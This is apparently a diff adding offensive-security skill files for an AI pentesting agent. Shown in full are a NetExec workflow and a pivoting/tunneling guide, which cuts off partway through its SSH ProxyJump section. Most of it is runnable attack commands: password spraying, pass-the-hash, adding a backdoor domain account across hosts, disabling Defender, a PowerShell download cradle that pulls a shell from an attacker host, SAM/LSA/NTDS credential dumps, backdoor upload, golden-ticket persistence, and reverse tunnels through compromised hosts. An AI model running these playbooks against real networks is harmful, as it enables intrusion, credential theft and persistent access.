- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,302 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# NetExec (CrackMapExec) — Complete Workflow
|
|
4
|
+
|
|
5
|
+
NetExec (nxc) is the successor to CrackMapExec — credential validation, lateral movement, and post-exploitation across SMB, WinRM, LDAP, MSSQL, SSH, RDP, FTP, NFS.
|
|
6
|
+
|
|
7
|
+
## Install
|
|
8
|
+
|
|
9
|
+
```bash
|
|
10
|
+
pip install netexec --break-system-packages
|
|
11
|
+
# OR:
|
|
12
|
+
sudo apt-get install -y netexec
|
|
13
|
+
# Verify:
|
|
14
|
+
nxc --version
|
|
15
|
+
nxc smb --help
|
|
16
|
+
```
|
|
17
|
+
|
|
18
|
+
---
|
|
19
|
+
|
|
20
|
+
## Phase 1: Host Discovery & SMB Enumeration
|
|
21
|
+
|
|
22
|
+
```bash
|
|
23
|
+
# Discover live hosts:
|
|
24
|
+
nxc smb 10.10.10.0/24
|
|
25
|
+
|
|
26
|
+
# Detailed host info (OS, hostname, signing, SMB version):
|
|
27
|
+
nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt # also finds no-signing hosts
|
|
28
|
+
|
|
29
|
+
# Single host info:
|
|
30
|
+
nxc smb 10.10.10.1
|
|
31
|
+
|
|
32
|
+
# Output format:
|
|
33
|
+
# SMB 10.10.10.1 445 DC01 [*] Windows Server 2019 Build 17763 (name:DC01) (domain:CORP.LOCAL) (signing:True) (SMBv1:False)
|
|
34
|
+
```
|
|
35
|
+
|
|
36
|
+
---
|
|
37
|
+
|
|
38
|
+
## Phase 2: Credential Validation & Spraying
|
|
39
|
+
|
|
40
|
+
```bash
|
|
41
|
+
# Test single credentials:
|
|
42
|
+
nxc smb 10.10.10.1 -u 'administrator' -p 'Password123!'
|
|
43
|
+
nxc smb 10.10.10.1 -u 'administrator' -H 'NTHASH' # pass-the-hash
|
|
44
|
+
|
|
45
|
+
# Password spray (one password, many users):
|
|
46
|
+
nxc smb 10.10.10.0/24 -u users.txt -p 'Password123!' --continue-on-success
|
|
47
|
+
nxc smb 10.10.10.0/24 -u users.txt -p 'Password123!' --no-bruteforce # one pass per user
|
|
48
|
+
|
|
49
|
+
# Username spray (many users, many passwords — CAREFUL: lockout risk):
|
|
50
|
+
nxc smb 10.10.10.0/24 -u users.txt -p passwords.txt --no-bruteforce
|
|
51
|
+
|
|
52
|
+
# Domain authentication:
|
|
53
|
+
nxc smb 10.10.10.0/24 -u 'user' -p 'pass' -d 'CORP.LOCAL'
|
|
54
|
+
|
|
55
|
+
# Kerberos authentication:
|
|
56
|
+
nxc smb 10.10.10.1 -u 'user' -p 'pass' -d 'CORP.LOCAL' -k
|
|
57
|
+
|
|
58
|
+
# Null session / anonymous:
|
|
59
|
+
nxc smb 10.10.10.1 -u '' -p ''
|
|
60
|
+
nxc smb 10.10.10.1 -u 'guest' -p ''
|
|
61
|
+
|
|
62
|
+
# Local account (not domain):
|
|
63
|
+
nxc smb 10.10.10.1 -u 'localadmin' -p 'password' --local-auth
|
|
64
|
+
|
|
65
|
+
# Successful auth marker: [+] → pwned: (Pwn3d!) = local admin
|
|
66
|
+
# CORP.LOCAL\user:Password123! [+] ← valid credentials
|
|
67
|
+
# CORP.LOCAL\user:Password123! (Pwn3d!) ← local admin on target
|
|
68
|
+
```
|
|
69
|
+
|
|
70
|
+
---
|
|
71
|
+
|
|
72
|
+
## Phase 3: Enumeration (Authenticated)
|
|
73
|
+
|
|
74
|
+
```bash
|
|
75
|
+
CREDS="-u 'user' -p 'password' -d 'CORP.LOCAL'"
|
|
76
|
+
|
|
77
|
+
# List SMB shares:
|
|
78
|
+
nxc smb 10.10.10.1 $CREDS --shares
|
|
79
|
+
|
|
80
|
+
# List logged-in users (sessions):
|
|
81
|
+
nxc smb 10.10.10.1 $CREDS --sessions
|
|
82
|
+
|
|
83
|
+
# List local groups:
|
|
84
|
+
nxc smb 10.10.10.1 $CREDS --local-groups
|
|
85
|
+
|
|
86
|
+
# List domain groups:
|
|
87
|
+
nxc smb 10.10.10.1 $CREDS --groups
|
|
88
|
+
|
|
89
|
+
# List users:
|
|
90
|
+
nxc smb 10.10.10.1 $CREDS --users
|
|
91
|
+
|
|
92
|
+
# List domain password policy:
|
|
93
|
+
nxc smb 10.10.10.1 $CREDS --pass-pol
|
|
94
|
+
|
|
95
|
+
# List logged-in users on all hosts:
|
|
96
|
+
nxc smb 10.10.10.0/24 $CREDS --sessions | grep -v "Failed\|Error"
|
|
97
|
+
|
|
98
|
+
# SMB share content enumeration:
|
|
99
|
+
nxc smb 10.10.10.1 $CREDS --shares --filter-shares READ WRITE
|
|
100
|
+
nxc smb 10.10.10.1 $CREDS -M spider_plus -o SHARE=share_name # recursive file listing
|
|
101
|
+
```
|
|
102
|
+
|
|
103
|
+
---
|
|
104
|
+
|
|
105
|
+
## Phase 4: Code Execution
|
|
106
|
+
|
|
107
|
+
```bash
|
|
108
|
+
CREDS="-u 'administrator' -p 'password' -d 'CORP.LOCAL'"
|
|
109
|
+
|
|
110
|
+
# Execute command (default: wmiexec):
|
|
111
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami"
|
|
112
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami /all"
|
|
113
|
+
|
|
114
|
+
# PowerShell execution:
|
|
115
|
+
nxc smb 10.10.10.1 $CREDS -X "Get-Process | Select-Object -First 5"
|
|
116
|
+
|
|
117
|
+
# Specific exec method:
|
|
118
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method wmiexec
|
|
119
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method smbexec
|
|
120
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method atexec
|
|
121
|
+
nxc smb 10.10.10.1 $CREDS -x "whoami" --exec-method mmcexec
|
|
122
|
+
|
|
123
|
+
# Execute on all Pwn3d hosts:
|
|
124
|
+
nxc smb 10.10.10.0/24 $CREDS -x "net user backdoor P@ssw0rd /add /domain"
|
|
125
|
+
|
|
126
|
+
# Disable Defender:
|
|
127
|
+
nxc smb 10.10.10.1 $CREDS -X "Set-MpPreference -DisableRealtimeMonitoring \$true"
|
|
128
|
+
|
|
129
|
+
# Reverse shell:
|
|
130
|
+
nxc smb 10.10.10.1 $CREDS -X "IEX(New-Object Net.WebClient).DownloadString('http://attacker_ip/shell.ps1')"
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
---
|
|
134
|
+
|
|
135
|
+
## Phase 5: Credential Dumping
|
|
136
|
+
|
|
137
|
+
```bash
|
|
138
|
+
CREDS="-u 'administrator' -p 'password' -d 'CORP.LOCAL'"
|
|
139
|
+
|
|
140
|
+
# SAM dump (local account hashes):
|
|
141
|
+
nxc smb 10.10.10.1 $CREDS --sam
|
|
142
|
+
|
|
143
|
+
# LSASS dump (domain account hashes in memory):
|
|
144
|
+
nxc smb 10.10.10.1 $CREDS --lsa
|
|
145
|
+
|
|
146
|
+
# DCSync (domain dump — requires replication rights or DA):
|
|
147
|
+
nxc smb <DC_IP> $CREDS --ntds # full NTDS dump
|
|
148
|
+
nxc smb <DC_IP> $CREDS --ntds --users administrator # specific user
|
|
149
|
+
|
|
150
|
+
# dpapi (browser/credential manager secrets):
|
|
151
|
+
nxc smb 10.10.10.1 $CREDS -M dpapi
|
|
152
|
+
|
|
153
|
+
# Dump all in one (SAM + LSA + NTDS):
|
|
154
|
+
nxc smb <DC_IP> $CREDS --sam --lsa --ntds
|
|
155
|
+
|
|
156
|
+
# LAPS (local admin passwords from AD):
|
|
157
|
+
nxc ldap <DC_IP> $CREDS -M laps
|
|
158
|
+
```
|
|
159
|
+
|
|
160
|
+
---
|
|
161
|
+
|
|
162
|
+
## Phase 6: WinRM
|
|
163
|
+
|
|
164
|
+
```bash
|
|
165
|
+
# WinRM (port 5985/5986) — PowerShell remoting
|
|
166
|
+
# Interactive shell:
|
|
167
|
+
nxc winrm 10.10.10.1 -u 'user' -p 'password' -d 'CORP.LOCAL'
|
|
168
|
+
|
|
169
|
+
# Command execution:
|
|
170
|
+
nxc winrm 10.10.10.1 -u 'user' -p 'password' -x "whoami"
|
|
171
|
+
|
|
172
|
+
# Spray for WinRM access:
|
|
173
|
+
nxc winrm 10.10.10.0/24 -u 'administrator' -p 'Password123!'
|
|
174
|
+
```
|
|
175
|
+
|
|
176
|
+
---
|
|
177
|
+
|
|
178
|
+
## Phase 7: LDAP
|
|
179
|
+
|
|
180
|
+
```bash
|
|
181
|
+
# LDAP enumeration (port 389/636):
|
|
182
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -d 'CORP.LOCAL'
|
|
183
|
+
|
|
184
|
+
# Kerberoastable accounts:
|
|
185
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -M kerberoasting
|
|
186
|
+
|
|
187
|
+
# AS-REP roastable:
|
|
188
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -M asreproast
|
|
189
|
+
|
|
190
|
+
# Password not required:
|
|
191
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -M pso
|
|
192
|
+
|
|
193
|
+
# LDAP password spray:
|
|
194
|
+
nxc ldap <DC_IP> -u users.txt -p 'Password123!' -d 'CORP.LOCAL'
|
|
195
|
+
|
|
196
|
+
# LAPS read:
|
|
197
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -M laps
|
|
198
|
+
|
|
199
|
+
# GMSA (Group Managed Service Account) passwords:
|
|
200
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' -M gmsa
|
|
201
|
+
|
|
202
|
+
# Dump domain users:
|
|
203
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' --users
|
|
204
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' --groups
|
|
205
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' --trusted-for-delegation
|
|
206
|
+
nxc ldap <DC_IP> -u 'user' -p 'password' --password-not-required
|
|
207
|
+
```
|
|
208
|
+
|
|
209
|
+
---
|
|
210
|
+
|
|
211
|
+
## Phase 8: MSSQL
|
|
212
|
+
|
|
213
|
+
```bash
|
|
214
|
+
# MSSQL (port 1433):
|
|
215
|
+
nxc mssql 10.10.10.1 -u 'sa' -p 'password' -d 'CORP.LOCAL'
|
|
216
|
+
|
|
217
|
+
# Execute OS command via xp_cmdshell:
|
|
218
|
+
nxc mssql 10.10.10.1 -u 'sa' -p 'password' -x "whoami"
|
|
219
|
+
|
|
220
|
+
# Enable xp_cmdshell if disabled:
|
|
221
|
+
nxc mssql 10.10.10.1 -u 'sa' -p 'password' -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;"
|
|
222
|
+
|
|
223
|
+
# PowerShell through MSSQL:
|
|
224
|
+
nxc mssql 10.10.10.1 -u 'sa' -p 'password' -X "Get-ChildItem C:\\"
|
|
225
|
+
|
|
226
|
+
# Linked server enumeration:
|
|
227
|
+
nxc mssql 10.10.10.1 -u 'sa' -p 'password' -q "SELECT name FROM sys.servers"
|
|
228
|
+
```
|
|
229
|
+
|
|
230
|
+
---
|
|
231
|
+
|
|
232
|
+
## Phase 9: Modules & Post-Exploitation
|
|
233
|
+
|
|
234
|
+
```bash
|
|
235
|
+
CREDS="-u 'admin' -p 'password' -d 'CORP.LOCAL'"
|
|
236
|
+
|
|
237
|
+
# List available modules:
|
|
238
|
+
nxc smb -L
|
|
239
|
+
nxc ldap -L
|
|
240
|
+
|
|
241
|
+
# Key modules:
|
|
242
|
+
nxc smb 10.10.10.1 $CREDS -M mimikatz # in-memory mimikatz (OPSEC risk!)
|
|
243
|
+
nxc smb 10.10.10.1 $CREDS -M met_inject # inject Meterpreter
|
|
244
|
+
nxc smb 10.10.10.1 $CREDS -M slinky # LNK file drop (credential theft)
|
|
245
|
+
nxc smb 10.10.10.1 $CREDS -M gpp_password # Group Policy Preferences passwords
|
|
246
|
+
nxc smb 10.10.10.1 $CREDS -M gpp_autologin # autologin credentials from GPP
|
|
247
|
+
nxc smb 10.10.10.1 $CREDS -M ms17-010 # EternalBlue check (no exploit)
|
|
248
|
+
nxc smb 10.10.10.0/24 $CREDS -M zerologon # Zerologon check
|
|
249
|
+
|
|
250
|
+
# GPP passwords (domain controller SYSVOL):
|
|
251
|
+
nxc smb <DC_IP> $CREDS -M gpp_password
|
|
252
|
+
nxc smb <DC_IP> $CREDS -M gpp_autologin
|
|
253
|
+
|
|
254
|
+
# File search (find sensitive files):
|
|
255
|
+
nxc smb 10.10.10.1 $CREDS -M spider_plus -o READ_ONLY=false
|
|
256
|
+
nxc smb 10.10.10.1 $CREDS -M spider_plus -o PATTERN='password,cred,secret,config'
|
|
257
|
+
|
|
258
|
+
# Download file:
|
|
259
|
+
nxc smb 10.10.10.1 $CREDS --get-file 'C:\Users\admin\Documents\passwords.txt' ./local_passwords.txt
|
|
260
|
+
|
|
261
|
+
# Upload file:
|
|
262
|
+
nxc smb 10.10.10.1 $CREDS --put-file ./backdoor.exe 'C:\Windows\Temp\backdoor.exe'
|
|
263
|
+
```
|
|
264
|
+
|
|
265
|
+
---
|
|
266
|
+
|
|
267
|
+
## Phase 10: Output & Automation
|
|
268
|
+
|
|
269
|
+
```bash
|
|
270
|
+
# Save results to file:
|
|
271
|
+
nxc smb 10.10.10.0/24 -u admin -p pass --export json output.json
|
|
272
|
+
|
|
273
|
+
# Filter output to successful only:
|
|
274
|
+
nxc smb 10.10.10.0/24 -u admin -p pass 2>/dev/null | grep "\[+\]"
|
|
275
|
+
|
|
276
|
+
# Pwn3d hosts (local admin):
|
|
277
|
+
nxc smb 10.10.10.0/24 -u admin -p pass 2>/dev/null | grep "Pwn3d!"
|
|
278
|
+
|
|
279
|
+
# Chain: spray → find DA sessions → dump:
|
|
280
|
+
nxc smb 10.10.10.0/24 -u users.txt -p 'Pass1234!' --continue-on-success > spray_results.txt
|
|
281
|
+
PWNED=$(grep "Pwn3d!" spray_results.txt | awk '{print $3}')
|
|
282
|
+
for ip in $PWNED; do
|
|
283
|
+
echo "=== Dumping $ip ==="
|
|
284
|
+
nxc smb $ip -u admin -p 'Pass1234!' --sam --lsa 2>/dev/null
|
|
285
|
+
done
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
---
|
|
289
|
+
|
|
290
|
+
## Pro Tips
|
|
291
|
+
|
|
292
|
+
1. **Always check SMB signing** — `--gen-relay-list` marks no-signing hosts → relay targets
|
|
293
|
+
2. **`--continue-on-success`** — essential for spray; stops at first valid cred per host otherwise
|
|
294
|
+
3. **`--local-auth`** — local account (not domain) useful for workstations with same local admin password
|
|
295
|
+
4. **Pwn3d! = local admin** — can dump SAM/LSASS → likely reused password or PTH to other hosts
|
|
296
|
+
5. **`-M gpp_password`** — finds plaintext creds in old GPO files, still common in 2024
|
|
297
|
+
6. **LDAP password spray** — lower lockout risk than SMB; some DCs don't lock on LDAP
|
|
298
|
+
7. **`nxc smb <DC> --ntds`** — equivalent to secretsdump; requires DA or DCSync privileges
|
|
299
|
+
|
|
300
|
+
## Summary
|
|
301
|
+
|
|
302
|
+
netexec flow: `nxc smb <subnet>` discover → spray with `users.txt` + `Pass1234!` → find `Pwn3d!` hosts → `--sam --lsa` on each → crack hashes → spray new creds → reach DC → `--ntds` for full dump → golden ticket for persistence.
|
|
@@ -0,0 +1,205 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: pivoting
|
|
5
|
+
description: Network pivoting and tunneling — chisel SOCKS proxy, ligolo-ng, socat port forwarding, SSH tunneling, proxychains, and reaching internal networks through a compromised host
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Pivoting & Tunneling
|
|
9
|
+
|
|
10
|
+
Pivoting = using a compromised host as a relay to reach internal network segments not directly accessible. Goal: route tools through a pivot point to scan/attack internal resources.
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
+
```
|
|
14
|
+
# chisel:
|
|
15
|
+
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz -O /tmp/chisel.gz && gunzip /tmp/chisel.gz && mv /tmp/chisel /home/pentester/tools/chisel && chmod +x /home/pentester/tools/chisel
|
|
16
|
+
# ligolo-ng:
|
|
17
|
+
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/proxy_linux_amd64 -O /home/pentester/tools/ligolo-proxy && chmod +x /home/pentester/tools/ligolo-proxy
|
|
18
|
+
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/agent_linux_amd64 -O /home/pentester/tools/ligolo-agent && chmod +x /home/pentester/tools/ligolo-agent
|
|
19
|
+
sudo apt-get install -y proxychains4 socat ncat
|
|
20
|
+
```
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## proxychains Setup
|
|
25
|
+
|
|
26
|
+
Used to route any tool through a SOCKS proxy:
|
|
27
|
+
|
|
28
|
+
# Edit /etc/proxychains4.conf:
|
|
29
|
+
# Comment out proxy_dns if causing issues
|
|
30
|
+
# At bottom:
|
|
31
|
+
socks5 127.0.0.1 1080 # for SOCKS5 proxy on local port 1080
|
|
32
|
+
|
|
33
|
+
# OR socks4 for chisel/SSH:
|
|
34
|
+
socks4 127.0.0.1 1080
|
|
35
|
+
|
|
36
|
+
# Use with any tool:
|
|
37
|
+
proxychains nmap -sT -p 80,443,22,445 10.10.10.0/24
|
|
38
|
+
proxychains crackmapexec smb 10.10.10.0/24 -u admin -p pass
|
|
39
|
+
proxychains evil-winrm -i 10.10.10.5 -u admin -p pass
|
|
40
|
+
proxychains curl http://internal-app.corp/
|
|
41
|
+
proxychains ssh user@internal-host
|
|
42
|
+
|
|
43
|
+
---
|
|
44
|
+
|
|
45
|
+
## chisel — SOCKS Proxy (Recommended for CTF/Pentest)
|
|
46
|
+
|
|
47
|
+
Chisel creates a TCP tunnel. Run server on attacker, agent on pivot host.
|
|
48
|
+
|
|
49
|
+
### Setup (attacker = Kali, pivot = compromised host)
|
|
50
|
+
|
|
51
|
+
# Step 1: Start chisel server on Kali:
|
|
52
|
+
/home/pentester/tools/chisel server --reverse -p 8001
|
|
53
|
+
# Listens on port 8001 for agents
|
|
54
|
+
|
|
55
|
+
# Step 2: Transfer chisel to pivot host and run as client:
|
|
56
|
+
# Linux pivot:
|
|
57
|
+
./chisel client <attacker_ip>:8001 R:1080:socks
|
|
58
|
+
# Windows pivot (download chisel.exe):
|
|
59
|
+
chisel.exe client <attacker_ip>:8001 R:1080:socks
|
|
60
|
+
|
|
61
|
+
# Step 3: Configure proxychains:
|
|
62
|
+
# /etc/proxychains4.conf: socks5 127.0.0.1 1080
|
|
63
|
+
|
|
64
|
+
# Step 4: Use proxychains to reach internal network:
|
|
65
|
+
proxychains nmap -sT -p 22,80,443,445 10.10.10.0/24
|
|
66
|
+
|
|
67
|
+
### Local Port Forward (specific port only)
|
|
68
|
+
|
|
69
|
+
# Expose internal service locally:
|
|
70
|
+
# Access 10.10.10.5:3306 (MySQL) via localhost:3306:
|
|
71
|
+
./chisel client <attacker_ip>:8001 R:3306:10.10.10.5:3306
|
|
72
|
+
|
|
73
|
+
# Access internal web app on 192.168.1.10:8080 via localhost:8080:
|
|
74
|
+
./chisel client <attacker_ip>:8001 R:8080:192.168.1.10:8080
|
|
75
|
+
|
|
76
|
+
---
|
|
77
|
+
|
|
78
|
+
## ligolo-ng — Layer-3 VPN Tunnel (Best for Full Network Access)
|
|
79
|
+
|
|
80
|
+
Ligolo creates a real network interface — no proxychains needed, nmap -sS works!
|
|
81
|
+
|
|
82
|
+
### Setup
|
|
83
|
+
|
|
84
|
+
# Step 1: Create tunnel interface on Kali:
|
|
85
|
+
sudo ip tuntap add user $(whoami) mode tun ligolo
|
|
86
|
+
sudo ip link set ligolo up
|
|
87
|
+
|
|
88
|
+
# Step 2: Start proxy on Kali:
|
|
89
|
+
sudo /home/pentester/tools/ligolo-proxy -selfcert -laddr 0.0.0.0:11601
|
|
90
|
+
|
|
91
|
+
# Step 3: Run agent on pivot host:
|
|
92
|
+
# Linux:
|
|
93
|
+
./ligolo-agent -connect <attacker_ip>:11601 -ignore-cert
|
|
94
|
+
# Windows:
|
|
95
|
+
ligolo-agent.exe -connect <attacker_ip>:11601 -ignore-cert
|
|
96
|
+
|
|
97
|
+
# Step 4: In ligolo proxy console → session established:
|
|
98
|
+
ligolo-ng>> session # Select connected agent
|
|
99
|
+
ligolo-ng>> ifconfig # See internal network interfaces
|
|
100
|
+
ligolo-ng>> start # Start tunnel
|
|
101
|
+
|
|
102
|
+
# Step 5: Add route on Kali for internal network:
|
|
103
|
+
sudo ip route add 10.10.10.0/24 dev ligolo
|
|
104
|
+
|
|
105
|
+
# Step 6: Now reach internal network DIRECTLY (no proxychains!):
|
|
106
|
+
nmap -sS -p 22,80,443,445 10.10.10.0/24 # Full nmap works
|
|
107
|
+
curl http://10.10.10.5/
|
|
108
|
+
ssh user@10.10.10.5
|
|
109
|
+
|
|
110
|
+
---
|
|
111
|
+
|
|
112
|
+
## SSH Tunneling
|
|
113
|
+
|
|
114
|
+
### Dynamic (SOCKS Proxy)
|
|
115
|
+
|
|
116
|
+
# SSH SOCKS5 proxy on local port 1080:
|
|
117
|
+
ssh -D 1080 user@<pivot_host>
|
|
118
|
+
# Then: proxychains <any_tool>
|
|
119
|
+
|
|
120
|
+
### Local Port Forward
|
|
121
|
+
|
|
122
|
+
# Access internal-host:3306 via localhost:3306:
|
|
123
|
+
ssh -L 3306:10.10.10.5:3306 user@<pivot_host>
|
|
124
|
+
|
|
125
|
+
# Access multiple internal services:
|
|
126
|
+
ssh -L 8080:internal-web:80 -L 3306:internal-db:3306 user@<pivot_host>
|
|
127
|
+
|
|
128
|
+
### Remote Port Forward (reverse tunnel)
|
|
129
|
+
|
|
130
|
+
# Expose attacker service through pivot (useful for reverse shells):
|
|
131
|
+
ssh -R 4444:localhost:4444 user@<pivot_host>
|
|
132
|
+
# On target inside network: nc <pivot_ip> 4444 → connects to attacker's port 4444
|
|
133
|
+
|
|
134
|
+
### ProxyJump (multi-hop)
|
|
135
|
+
|
|
136
|
+
